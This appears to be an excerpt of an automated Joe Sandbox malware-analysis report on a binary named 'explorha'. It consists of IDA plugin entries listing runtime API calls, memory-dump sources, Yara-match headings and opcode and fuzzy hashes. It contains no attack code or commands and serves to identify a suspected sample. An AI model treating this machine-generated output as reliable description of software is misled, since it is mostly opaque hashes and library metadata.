                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::$Search$Work$Context::$Base::Scheduler$CachePriorityQuick$AcquireCheckItemItem::ListLocal_NextObjectPeriodicRunnablesScanSlot
                                                                                                      • String ID:
                                                                                                      • API String ID: 2530155754-0
                                                                                                      • Opcode ID: 923d77ecf66b88da390beb9ff1f48e22655cf46727eccdb365e0eb4e60244d54
                                                                                                      • Instruction ID: 3948ec2a8e1d3276f2fcb1f5f8df70fad3298fcbced3af7c0b44118a2934ac50
                                                                                                      • Opcode Fuzzy Hash: 923d77ecf66b88da390beb9ff1f48e22655cf46727eccdb365e0eb4e60244d54
                                                                                                      • Instruction Fuzzy Hash: A9818F35904249ABDF16AF98C955BBE7B72FF55308F080098FC41AB252CB328E15DB62
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 0089400F
                                                                                                        • Part of subcall function 00893B6E: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00893B91
                                                                                                      • Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 00894030
                                                                                                      • Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 0089403D
                                                                                                      • Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 0089408B
                                                                                                      • Concurrency::details::WorkSearchContext::SearchCacheLocal_Unrealized.LIBCONCRT ref: 00894133
                                                                                                      • Concurrency::details::WorkSearchContext::SearchCacheLocal_Realized.LIBCONCRT ref: 00894165
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::Search$Work$Context::$Base::CacheLocal_PriorityScheduler$CheckItemItem::ListNextObjectPeriodicRealizedScanUnrealized
                                                                                                      • String ID:
                                                                                                      • API String ID: 1256429809-0
                                                                                                      • Opcode ID: 6f75d936c082a49eb98faf2fb6847ad890a4aa0d8cccdfe6b00d233b09b96e3e
                                                                                                      • Instruction ID: b850da07a90678af89022dedda42b2903d02b6491809d1a151675e67a1f34501
                                                                                                      • Opcode Fuzzy Hash: 6f75d936c082a49eb98faf2fb6847ad890a4aa0d8cccdfe6b00d233b09b96e3e
                                                                                                      • Instruction Fuzzy Hash: E5719970900209AFDF15EF98C980EBEBBB6FF95304F085098ED51AB252C7328D56DB61
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00883F06
                                                                                                      • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00883F6F
                                                                                                      • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00883FA3
                                                                                                        • Part of subcall function 00881E7D: Concurrency::details::ResourceManager::AffinityRestriction::ApplyAffinityLimits.LIBCMT ref: 00881E9D
                                                                                                      • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00884023
                                                                                                      • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 0088406B
                                                                                                        • Part of subcall function 00881E52: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00881E6E
                                                                                                      • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 0088407F
                                                                                                      • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00884090
                                                                                                      • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 008840DD
                                                                                                      • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 0088410E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::Manager::Resource$Affinity$Apply$Restrictions$InformationTopology$Restriction::$CleanupFindGroupLimits
                                                                                                      • String ID:
                                                                                                      • API String ID: 1321587334-0
                                                                                                      • Opcode ID: e9ccd4340980efb60135b0313576795e36bbc3501eecbab44c729e9519b2a874
                                                                                                      • Instruction ID: a7f030993e7f715a196a8e65130de1ad563ab01dde32415c2ecfe0fdfc319219
                                                                                                      • Opcode Fuzzy Hash: e9ccd4340980efb60135b0313576795e36bbc3501eecbab44c729e9519b2a874
                                                                                                      • Instruction Fuzzy Hash: CA81CE72A0452ADFCF18EFA8D8819BEBBB5FB48304B24442DD546E7641DB309A41CF81
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 008880AF
                                                                                                      • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 008880E1
                                                                                                      • List.LIBCONCRT ref: 0088811C
                                                                                                      • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 0088812D
                                                                                                      • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00888149
                                                                                                      • List.LIBCONCRT ref: 00888184
                                                                                                      • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00888195
                                                                                                      • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 008881B0
                                                                                                      • List.LIBCONCRT ref: 008881EB
                                                                                                      • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 008881F8
                                                                                                        • Part of subcall function 0088756F: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00887587
                                                                                                        • Part of subcall function 0088756F: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00887599
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::Scheduling$Find$GroupNode::ProcessorRing::ScheduleSegmentVirtual$ListNext$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
                                                                                                      • String ID:
                                                                                                      • API String ID: 3403738998-0
                                                                                                      • Opcode ID: 49fcf71f40cdee32d76cff0cfec7904b1821ee1dee631ce0987f33fef910e908
                                                                                                      • Instruction ID: 19059f832d7bbff8da5ba4d2e5e3f115d8805299612c7d892f4b97b1a940d43a
                                                                                                      • Opcode Fuzzy Hash: 49fcf71f40cdee32d76cff0cfec7904b1821ee1dee631ce0987f33fef910e908
                                                                                                      • Instruction Fuzzy Hash: 7E514D75A00209EBDB04EFA4C995BEDB3A8FF08304F544069E905EB282DF30EE45CB90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • IsInExceptionSpec.LIBVCRUNTIME ref: 00896A30
                                                                                                      • type_info::operator==.LIBVCRUNTIME ref: 00896A57
                                                                                                      • ___TypeMatch.LIBVCRUNTIME ref: 00896B63
                                                                                                      • IsInExceptionSpec.LIBVCRUNTIME ref: 00896C3E
                                                                                                      • CallUnexpected.LIBVCRUNTIME ref: 00896CE0
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionSpec$CallMatchTypeUnexpectedtype_info::operator==
                                                                                                      • String ID: csm$csm$csm
                                                                                                      • API String ID: 4162181273-393685449
                                                                                                      • Opcode ID: d44c1c682a52fa81a18c0eda1c9bd94d3c456dfafb79210a1ae8118131f913d0
                                                                                                      • Instruction ID: 9c065c7289c1adcad1988cc498fd0a8f5aa0e6cac750f70983175f982f6117f6
                                                                                                      • Opcode Fuzzy Hash: d44c1c682a52fa81a18c0eda1c9bd94d3c456dfafb79210a1ae8118131f913d0
                                                                                                      • Instruction Fuzzy Hash: 75C14B718002199FCF25EFA8C8819AEBBB5FF04314F18455AF851EB216E735DA61CB92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 00888A40
                                                                                                      • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 00888A82
                                                                                                      • Concurrency::details::InternalContextBase::GetAndResetOversubscribedVProc.LIBCMT ref: 00888A9E
                                                                                                      • Concurrency::details::VirtualProcessor::MarkForRetirement.LIBCONCRT ref: 00888AA9
                                                                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00888AD0
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::$Virtual$FindMatchingNode::ProcessorScheduling$Base::ContextInternalMarkOversubscribedProcProcessor::ResetRetirementstd::invalid_argument::invalid_argument
                                                                                                      • String ID: count$ppVirtualProcessorRoots
                                                                                                      • API String ID: 3897347962-3650809737
                                                                                                      • Opcode ID: b8d83801b1b0ba7588fa2cd29a10a0d5445bf372047b60212eb27e572459211d
                                                                                                      • Instruction ID: 42568bb829c579c5c8a087061869b14cb99eb3a042b4d2badfc1604fe93e82f1
                                                                                                      • Opcode Fuzzy Hash: b8d83801b1b0ba7588fa2cd29a10a0d5445bf372047b60212eb27e572459211d
                                                                                                      • Instruction Fuzzy Hash: DD213C34A00219EFDF18EFA8C995AADB7B5FF45340F444069E905E7392DB34AE05CB52
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00888F93
                                                                                                        • Part of subcall function 00887348: __EH_prolog3_catch.LIBCMT ref: 0088734F
                                                                                                        • Part of subcall function 00887348: Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00887388
                                                                                                      • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00888FBA
                                                                                                      • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00888FC6
                                                                                                        • Part of subcall function 00887348: Concurrency::details::SchedulerBase::AddContext.LIBCONCRT ref: 00887400
                                                                                                        • Part of subcall function 00887348: Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 0088740E
                                                                                                      • Concurrency::details::SchedulerBase::GetNextSchedulingRing.LIBCMT ref: 00889012
                                                                                                      • Concurrency::location::_Assign.LIBCMT ref: 00889033
                                                                                                      • Concurrency::details::SchedulerBase::StartupVirtualProcessor.LIBCONCRT ref: 0088903B
                                                                                                      • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 0088904D
                                                                                                      • Concurrency::details::SchedulerBase::ChangeThrottlingTimer.LIBCONCRT ref: 0088907D
                                                                                                        • Part of subcall function 00887FAD: Concurrency::details::SchedulerBase::FoundAvailableVirtualProcessor.LIBCONCRT ref: 00887FD2
                                                                                                        • Part of subcall function 00887FAD: Concurrency::details::VirtualProcessor::ClaimTicket::ExerciseWith.LIBCMT ref: 00887FF5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::$Base::$Scheduler$ContextThrottling$InternalTimeVirtual$Processor$AssignAvailableBlockedChangeClaimConcurrency::location::_ExerciseFoundH_prolog3_catchNextProcessor::RingSchedulingSpinStartupTicket::TimerUntilWith
                                                                                                      • String ID:
                                                                                                      • API String ID: 1475861073-0
                                                                                                      • Opcode ID: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
                                                                                                      • Instruction ID: c3c229ecc9c9e203ae715f38f8b228b40a5aa7f19975e8644c9f98637278df22
                                                                                                      • Opcode Fuzzy Hash: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
                                                                                                      • Instruction Fuzzy Hash: 85312730B04255ABCF16BA7C48927FEBBB6FF55344F080169E582E7242DF254D46C792
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00895F07
                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00895F0F
                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00895F98
                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00895FC3
                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00896018
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                      • String ID: csm
                                                                                                      • API String ID: 1170836740-1018135373
                                                                                                      • Opcode ID: f730a51fc9f99e788140a159127c1b9db633dd23b2f10b4a50647b66fb16fb0e
                                                                                                      • Instruction ID: b91301f76038887e74df762e99d0a9f340721ea219131c4d9cd7fd778d6db821
                                                                                                      • Opcode Fuzzy Hash: f730a51fc9f99e788140a159127c1b9db633dd23b2f10b4a50647b66fb16fb0e
                                                                                                      • Instruction Fuzzy Hash: 7741B030A00608EFCF11EF6CC885A9EBBB5FF45324F188155E819DB392DB319A45CB92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 0088F421
                                                                                                      • Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 0088F43E
                                                                                                      • Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 0088F4A4
                                                                                                      • Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 0088F4B9
                                                                                                      • Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 0088F4CB
                                                                                                      • Concurrency::details::InternalContextBase::CleanupDispatchedContextOnCancel.LIBCMT ref: 0088F4DB
                                                                                                      • Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 0088F504
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::$Context$Base::Internal$ChoreWork$AssociatedCancelCleanupCompletionCreateCurrentDispatchedExecuteExecutedFoundInlineListThreadWait
                                                                                                      • String ID:
                                                                                                      • API String ID: 2885714658-0
                                                                                                      • Opcode ID: 2001e0edc81896b002909e73c5d1f19f2a4d2712d7c1e0581db6fd53791d3ef3
                                                                                                      • Instruction ID: a1213067ff03fb635f0d6f71eb3363cb4686169860a4ed042ec30121c8fe2a96
                                                                                                      • Opcode Fuzzy Hash: 2001e0edc81896b002909e73c5d1f19f2a4d2712d7c1e0581db6fd53791d3ef3
                                                                                                      • Instruction Fuzzy Hash: ED419D20A002449ADF15FFB884557AD77A1FF45304F1840BAEA45EB2C7DB248A09CB67
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 0088FE67
                                                                                                        • Part of subcall function 0088FBD4: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 0088FC07
                                                                                                        • Part of subcall function 0088FBD4: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 0088FC29
                                                                                                      • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0088FEE4
                                                                                                      • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 0088FEF0
                                                                                                      • Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 0088FEFF
                                                                                                      • Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0088FF09
                                                                                                      • Concurrency::location::_Assign.LIBCMT ref: 0088FF3D
                                                                                                      • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0088FF45
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::$Base::$Context$Virtual$DeactivateGroupInternalProcessorProcessor::ScheduleSchedulerSegment$ActiveAssignCommitConcurrency::location::_EventPointsReclaimReleaseRunnableSafeTraceTrigger
                                                                                                      • String ID:
                                                                                                      • API String ID: 1924466884-0
                                                                                                      • Opcode ID: 2c343f99d94c0f2260b8b263544358e48983284ebac8dd8a13f1746a32edf971
                                                                                                      • Instruction ID: 8d8b63e64fd338923d5c644d0d3983878d4923dfd6fde461acd9256b2ccf8f41
                                                                                                      • Opcode Fuzzy Hash: 2c343f99d94c0f2260b8b263544358e48983284ebac8dd8a13f1746a32edf971
                                                                                                      • Instruction Fuzzy Hash: 70411C75A00204DFCF05EF68C495AADB7B5FF49310F1880AAEE59DB382DB34A941CB91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • ListArray.LIBCONCRT ref: 00885BC8
                                                                                                      • ListArray.LIBCONCRT ref: 00885BFC
                                                                                                      • Hash.LIBCMT ref: 00885C65
                                                                                                      • Hash.LIBCMT ref: 00885C75
                                                                                                        • Part of subcall function 0088B2D1: std::bad_exception::bad_exception.LIBCMT ref: 0088B2F3
                                                                                                      • Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00885DDB
                                                                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00885E34
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ArrayHashList$AsyncConcurrency::details::Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorLibraryLoadRegisterTimerstd::bad_exception::bad_exception
                                                                                                      • String ID:
                                                                                                      • API String ID: 3010677857-0
                                                                                                      • Opcode ID: 05ee87ddd27e704654334cd8d584d3048223ff21310e1b6e7af2c7e9520d499a
                                                                                                      • Instruction ID: 24e5de11303ad1e01c3ab8a14869339d3e1889bdac51bc28079acbf0097795ca
                                                                                                      • Opcode Fuzzy Hash: 05ee87ddd27e704654334cd8d584d3048223ff21310e1b6e7af2c7e9520d499a
                                                                                                      • Instruction Fuzzy Hash: EF8174B0A11B56BAD704EF78C845BD9FBA8FF49704F10421AF428D7681DBB4A624CBD1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • _SpinWait.LIBCONCRT ref: 0088054C
                                                                                                      • Concurrency::details::WaitBlock::WaitBlock.LIBCMT ref: 00880558
                                                                                                      • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 00880571
                                                                                                      • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0088059F
                                                                                                      • Concurrency::Context::Block.LIBCONCRT ref: 008805C1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Wait$BlockConcurrency::details::_Lock::_Scoped_lock$Block::Concurrency::Concurrency::details::Context::ReaderReentrantScoped_lock::_Scoped_lock::~_SpinWriter
                                                                                                      • String ID:
                                                                                                      • API String ID: 1182035702-0
                                                                                                      • Opcode ID: 7f2cbedb5d4428b1f35366b455333c9d8a2644d7925ac163564deea5344e319e
                                                                                                      • Instruction ID: 071ea725f34ae6af319d2e64d94368df14ae01629bd801c84a4da60c9d56d631
                                                                                                      • Opcode Fuzzy Hash: 7f2cbedb5d4428b1f35366b455333c9d8a2644d7925ac163564deea5344e319e
                                                                                                      • Instruction Fuzzy Hash: 4A216070C012099ADFA4EFA8C8556EEB7F0FF15310F200559E165F6191EB719A48CF62
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 008931E4
                                                                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 008931F3
                                                                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 008932B7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: std::invalid_argument::invalid_argument$Concurrency::details::FreeIdleProcessorResetRoot::Virtual
                                                                                                      • String ID: pContext$switchState
                                                                                                      • API String ID: 2656283622-2660820399
                                                                                                      • Opcode ID: 9c8bab2af32fac1c4fd3d168f76f8893f2f71bbfbe68584609d0e89b2b3d5ab2
                                                                                                      • Instruction ID: e784610e0688bbf88d92d4188ce1626f5fecd378aa9275fbb83dcf04ce312820
                                                                                                      • Opcode Fuzzy Hash: 9c8bab2af32fac1c4fd3d168f76f8893f2f71bbfbe68584609d0e89b2b3d5ab2
                                                                                                      • Instruction Fuzzy Hash: AE31A475A00214ABCF09FFA8C885A6D7379FF44314F284565E825E7392DB34EF058791
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • FindSITargetTypeInstance.LIBVCRUNTIME ref: 008964FD
                                                                                                      • FindMITargetTypeInstance.LIBVCRUNTIME ref: 00896516
                                                                                                      • PMDtoOffset.LIBCMT ref: 0089653C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: FindInstanceTargetType$Offset
                                                                                                      • String ID: Bad dynamic_cast!
                                                                                                      • API String ID: 1467055271-2956939130
                                                                                                      • Opcode ID: ae87c9d35ebcb9de134ee3e3b30534ee7ec617c0dd30888f945684f5ecd979dd
                                                                                                      • Instruction ID: 092f25c222a32dd4eeb88902eaa846cff0540cace924b837631ac9311453a9c2
                                                                                                      • Opcode Fuzzy Hash: ae87c9d35ebcb9de134ee3e3b30534ee7ec617c0dd30888f945684f5ecd979dd
                                                                                                      • Instruction Fuzzy Hash: 44212772A002059FDF18FFA8DD06EAE37B8FB84720F1C8129E915D3284F734E9208695
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: _wcsrchr
                                                                                                      • String ID: .bat$.cmd$.com$.exe
                                                                                                      • API String ID: 1752292252-4019086052
